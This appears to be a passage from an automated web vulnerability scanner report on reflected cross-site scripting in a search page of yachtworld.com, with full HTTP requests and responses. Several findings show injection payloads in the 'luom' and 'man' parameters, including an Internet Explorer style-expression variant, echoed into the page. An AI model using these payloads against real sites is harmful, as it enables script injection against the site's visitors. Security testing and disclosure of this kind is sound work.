GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126b0ec3%2522%253balert%25281%2529%252f%252f49ee2de717e&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&N=3941&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:20:04 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="3941"
s.prop5="regulator"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24126b0ec3";alert(1)//49ee2de717e-32126b0ec3";alert(1)//49ee2de717e"
s.prop9=">
...[SNIP]...

3.381. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the luom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8980"%3balert(1)//282711d9efdc263a2 was submitted in the luom parameter. This input was echoed as a8980";alert(1)//282711d9efdc263a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126a8980"%3balert(1)//282711d9efdc263a2&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:52 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24126a8980";alert(1)//282711d9efdc263a2-32126a8980";alert(1)//282711d9efdc263a2"
s.prop9=">
...[SNIP]...

3.382. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the luom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33903"%3balert(1)//e2ce346726d was submitted in the luom parameter. This input was echoed as 33903";alert(1)//e2ce346726d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=12633903"%3balert(1)//e2ce346726d&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:54 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="2412633903";alert(1)//e2ce346726d-3212633903";alert(1)//e2ce346726d"
s.prop9=">
...[SNIP]...

3.383. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the man request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69386"%3balert(1)//35c2b8126ad was submitted in the man parameter. This input was echoed as 69386";alert(1)//35c2b8126ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator69386"%3balert(1)//35c2b8126ad&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:13 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator69386";alert(1)//35c2b8126ad"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">
...[SNIP]...

3.384. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the man request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a8e"style%3d"x%3aexpression(alert(1))"35df26c4644 was submitted in the man parameter. This input was echoed as 42a8e"style="x:expression(alert(1))"35df26c4644 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator42a8e"style%3d"x%3aexpression(alert(1))"35df26c4644&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:13 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 99292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<meta name="description" content="2004 regulator42a8e"style="x:expression(alert(1))"35df26c4644 Boats For Sale - YachtWorld.com">
...[SNIP]...

3.385. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the man request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42756"style%3d"x%3aexpression(alert(1))"4d461dcf13719d17d was submitted in the man parameter. This input was echoed as 42756"style="x:expression(alert(1))"4d461dcf13719d17d in the application's response.

